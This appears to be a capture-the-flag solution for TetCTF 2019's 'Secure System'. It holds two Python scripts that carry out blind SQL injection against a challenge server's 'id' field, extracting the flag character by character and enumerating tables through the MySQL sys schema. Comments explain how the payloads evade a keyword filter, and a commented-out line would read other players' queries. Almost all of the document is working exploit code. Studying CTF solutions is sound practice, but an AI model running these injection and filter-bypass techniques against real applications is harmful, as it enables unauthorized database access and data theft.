Solution to Secure System - TetCTF 2019. Two scripts are pasted back to back: a Python 2 boolean-based blind SQL injection that extends a known flag prefix one character per pass (it relies on the 2.x-only str.encode('hex')), followed by a Python 3 variant (print(..., end='')) that recovers each character by binary search and enumerates table names through the MySQL sys schema.
import requests
# Target and the HTTP session reused for every oracle request.
URL = 'http://45.77.240.178:8002'
sess = requests.Session()
# Boolean oracle injected into the `id` POST field (see try_payload below).
# {flag} receives a 0x.. hex literal of the guessed prefix; the row-wise
# comparison against SELECT * of the flag table yields 1 or 0, so the final
# `+1` turns id into 2 (prefix still <= flag) or 1 (prefix sorts past it).
payload = (
    '((SELECT 1,CONCAT({flag}, CAST("0" as JSON)))'
    ' <= (SELECT * FROM `Th1z_Fack1n_Fl4444g_Tabl3`))+1'
)
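def try_payload(payload):
    """POST the injected expression as the `id` field and return True iff the
    response does NOT contain 'Hello guest'.

    The extraction loop below reads True as "prefix+c now sorts after the flag"
    (the parameter shadows the module-level template; callers pass the already
    formatted string). The HTTP status is deliberately not checked: an error
    page is itself a meaningful oracle answer.

    A request timeout keeps the loop from hanging forever on a dead or throttled
    host; on timeout `requests` raises instead of returning a bogus answer.
    """
    r = sess.post(URL, data={'id': payload}, timeout=10)
    return 'Hello guest' not in r.text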
# Candidate characters in ascending code-point order. The loop below depends on
# that ordering: it walks the alphabet until the oracle reports that prefix+c
# sorts after the flag, then accepts the previous candidate. '}' is last and
# closes the flag.
ASCIIAlphabet = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz}"
# Not referenced anywhere below (presumably an earlier/alternate result).
flag2 = 'TETCTF{0WL_D0NKEY_MEANS_LIARRRRRRR}'
# Known prefix to resume from; one character is appended per pass of the loop.
flag = 'TetCTF{0wl_d0nkey_m'
# Last candidate that still sorted <= the flag; '' means none accepted yet.
last_c = ''
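# Boolean-based blind extraction, one character per pass. Candidates are tried
# in ascending order; the first one for which try_payload() reports that
# prefix+c sorts after the flag means the previous candidate (last_c) is the
# right one. Two termination cases the original lacked (it looped forever):
#   * no candidate is accepted -> the flag is complete, or its next character
#     is outside ASCIIAlphabet (check the alphabet before re-running);
#   * every candidate sorts <= the flag -> the next character is the last
#     alphabet entry ('}'), which also closes the flag.
while True:
    last_c = ''
    for c in ASCIIAlphabet:
        t = flag + c
        # 0x.. hex literal: keeps quotes/case out of the injected string and,
        # unlike str.encode('hex'), works on both Python 2 and 3.
        t = '0x' + ''.join('%02x' % ord(ch) for ch in t)
        if try_payload(payload.format(flag=t)):
            break
        last_c = c
    if not last_c:
        break
    flag += last_c
    print(flag)
    if last_c == ASCIIAlphabet[-1]:
        break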
import requests, urllib, re, sys
sess = requests.Session()
# Progress-echo switch for printInPlace(); recovered text is printed regardless.
fancy_console = False
URL = 'http://45.77.240.178:8002'
# Error-based boolean oracle, injected as the `id` POST field.
#   {variable} -- filled by gen_payload() via str.format: the SQL expression
#                 (here a parenthesised sub-select) whose value is being read
#   @wOFFSET@  -- 1-based SUBSTR position, substituted by findNames()
#   @cORD@     -- candidate code point, substituted by findName()
# (@rOFFSET@, the LIMIT row index, lives inside `variable`, not in this template.)
# SUBSTR takes one character, HEX+CONV turn it into its code point, and the `<=`
# yields 0 or 1. Scaled by 1111 and fed to EXP(), a true comparison presumably
# overflows DOUBLE and errors out, while a false one gives EXP(0)+1 = 2, an
# ordinary id whose page contains 'Hello guest' (see tryPayload).
# No AND/OR/IF/CASE/SLEEP appear because the filter noted at the bottom of this
# script rejects those words -- hence arithmetic instead of a conditional.
payload = '''EXP(
(CONV(
HEX(
SUBSTR({variable},@wOFFSET@,1)
),16,10
)<=@cORD@)
*1111)+1'''
# Candidate sets for findName()'s binary search. Each one MUST be sorted by code
# point (the search assumes it), and index 0 is the "\001" sentinel: past the end
# of the string SUBSTR yields ''/NULL, which the oracle never reports as
# "greater", so the search bottoms out on "\001" and findNames() reads that as
# end-of-row.
ASCIIAlphabet = "\001 !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~"
simpleAlphabet = "\001abcdefghijklmnopqrstuvwxyz"
HEXAlphabet = "\0010123456789abcdef"
advancedAlphabet= "\0010123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz"
def gen_payload(variable):
    """Build the oracle query for `variable` and flatten it onto one line.

    `variable` is a SQL expression (in this file a parenthesised sub-select)
    that replaces the {variable} placeholder of the module-level `payload`
    template via str.format. Every run of whitespace, including the template's
    newlines and any inside `variable`, is squeezed to a single space. The
    @wOFFSET@ / @cORD@ / @rOFFSET@ markers are left for the callers to fill.
    """
    filled = payload.format(variable=variable)
    squeeze_ws = re.compile(r'\s+')
    return squeeze_ws.sub(' ', filled)
def check_char(id):
    """Placeholder that is never called in this file; always returns None.

    The parameter shadows the builtin `id`; the signature is kept as-is.
    """
    return None
def printInPlace(alert):
    """Echo `alert` on stdout and backspace over it so the next write overwrites
    it -- a cheap progress indicator for the candidate being probed.

    Only active when the module-level `fancy_console` flag is True; the flag's
    value is returned either way.
    """
    if not fancy_console:
        return fancy_console
    erase = "\b" * len(alert)
    sys.stdout.write("{}{}".format(alert, erase))
    sys.stdout.flush()
    return fancy_console
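def tryPayload(payload):
    """POST the injected expression as the `id` field and return True iff the
    response contains 'Hello guest'.

    With the EXP() oracle this presumably means the comparison in the payload
    was false (EXP(0)+1 = 2, a valid id); a true comparison errors out and the
    page lacks that text. Note the polarity is the OPPOSITE of try_payload() in
    the first script above. The HTTP status is deliberately not checked, since
    an error page is itself a meaningful answer.

    A request timeout keeps findName() from hanging forever on a dead or
    throttled host; on timeout `requests` raises rather than returning a bogus
    oracle answer.
    """
    r = sess.post(URL, data={'id': payload}, timeout=10)
    return 'Hello guest' in r.text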
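# bin-search one character inside [alphabet]
def findName(payload, alphabet):
    """Recover one character with a binary search over `alphabet`.

    `payload` must still contain the @cORD@ marker (every other marker already
    substituted). For a candidate c the oracle tryPayload() answers whether the
    target character sorts after c (True -> search the upper half), so
    `alphabet` MUST be sorted by code point; the search converges on the
    smallest entry >= the real character. Each probe costs one HTTP request.

    Returns that entry. If the real character is not in `alphabet` the result is
    the next larger entry (or the last one) -- a wrong alphabet silently yields
    wrong text rather than an error, so pick the alphabet carefully.

    Raises ValueError for an empty or unsorted alphabet, which would otherwise
    produce an IndexError or garbage.
    """
    if not alphabet:
        raise ValueError("alphabet must not be empty")
    if list(alphabet) != sorted(alphabet):
        raise ValueError("alphabet must be sorted by code point")
    lo, hi = 0, len(alphabet) - 1
    while lo < hi:
        mid = (lo + hi) // 2
        c = alphabet[mid]
        printInPlace(c)
        probe = payload.replace("@cORD@", str(ord(c)))
        if tryPayload(probe):
            lo = mid + 1   # target > c
        else:
            hi = mid       # target <= c
    return alphabet[lo]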
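def findNames(payload, alphabet, max_rows=10, max_len=199):
    """Dump up to `max_rows` result rows of the query embedded in `payload`, one
    character at a time, printing each row as it is recovered.

    `payload` must still contain @rOFFSET@ (row index for the LIMIT clause) and
    @wOFFSET@ (1-based SUBSTR position); both are substituted here and each
    character is found by findName(). A row ends when findName() returns
    alphabet[0], the "\001" sentinel the oracle lands on past the end of the
    string. Extraction stops once a row yields at most one character, which is
    how an exhausted LIMIT is detected.

    Rows longer than `max_len` characters are truncated silently; the defaults
    reproduce the original hard-coded limits (10 rows, 199 characters).

    Returns the list of recovered rows, including the final short one (the
    original returned None, so callers that ignore the result are unaffected).
    """
    rows = []
    for result_offset in range(0, max_rows):
        pl = payload.replace("@rOFFSET@", str(result_offset))
        chars = []
        for word_offset in range(1, max_len + 1):
            c = findName(pl.replace("@wOFFSET@", str(word_offset)), alphabet)
            if c == alphabet[0]:
                break
            print(c, end='')
            sys.stdout.flush()
            chars.append(c)
        print(" ")
        result = "".join(chars)
        rows.append(result)
        if len(result) <= 1:
            break
    return rows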
# Server-side filter the payloads have to survive (both checks are case-insensitive
# and the request is rejected on a match):
# preg_match('/and|or|in|if|case|sleep|benchmark/is' , $_POST['id'])
# preg_match('/order.+?by|union.+?select/is' , $_POST['id'])
# The bare `in` is the harsh one: it also rejects SUBSTRING, INFORMATION_SCHEMA and
# anything else containing that letter pair. That is why the payload uses SUBSTR,
# the sys-schema views below instead of information_schema, EXP()/CONV() arithmetic
# instead of IF/CASE/AND/OR, and an error-based rather than time-based
# (SLEEP/BENCHMARK) oracle.
# Flag table, presumably what the enumeration below turned up: Th1z_Fack1n_Fl4444g_Tabl3
# Enumerate table names through the sys schema (information_schema would trip the
# /in/ filter). @rOFFSET@ is left for findNames() to page through the rows, and
# advancedAlphabet ([0-9A-Z_a-z]) is enough for identifiers.
TABLE_NAME_QUERY = '''(select table_name from sys.x$schema_flattened_keys LIMIT @rOFFSET@, 1)'''
findNames(gen_payload(TABLE_NAME_QUERY), advancedAlphabet)
# retrieve others' solutions: sys.x$statement_analysis is presumably a sys-schema
# view over recently executed statement digests, so on a shared challenge box it
# exposes other players' queries against the flag table. Kept commented out; it
# needs the full ASCIIAlphabet because queries contain punctuation.
# findNames(gen_payload('''(select query from sys.`x$statement_analysis` where query like '%Th1z_Fack1n_Fl4444g_Tabl3%' LIMIT @rOFFSET@, 1)'''), ASCIIAlphabet)